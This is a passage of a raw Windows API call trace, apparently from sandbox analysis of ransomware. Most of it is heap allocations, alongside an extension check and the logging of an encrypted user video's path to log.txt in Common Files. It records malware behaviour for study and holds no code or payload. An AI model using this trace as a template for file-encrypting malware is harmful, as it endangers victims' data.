Size=0x8) returned 0x7af338 [0041.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.823] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.824] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.824] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.824] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.824] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0041.824] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0041.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.825] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.825] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.825] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0041.825] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.825] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0041.825] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.826] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.826] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0041.826] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x3274, lpOverlapped=0x0) returned 1 [0041.827] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0041.827] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x3274, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.827] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.encrypted.avi\r\n", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0041.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a) returned 0x7ab338 [0041.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.encrypted.avi\r\n", cchWideChar=58, lpMultiByteStr=0x7ab338, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2TVP.encrypted.avi\r\n", lpUsedDefaultChar=0x0) returned 58 [0041.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.827] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.827] WriteFile (in: hFile=0x128, lpBuffer=0x7ab380*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab380*, lpNumberOfBytesWritten=0x6aee3c*=0x39, lpOverlapped=0x0) returned 1 [0041.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.827] CloseHandle (hObject=0x128) returned 1 [0041.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0041.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0028 | out: hHeap=0x770000) returned 1 [0041.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0041.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.829] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0041.829] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.829] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.831] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.831] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.831] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0041.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.831] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0041.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0041.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0041.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0041.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898e0 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0041.832] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0041.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.832] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0041.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0041.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0041.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.833] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0041.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.834] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.835] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 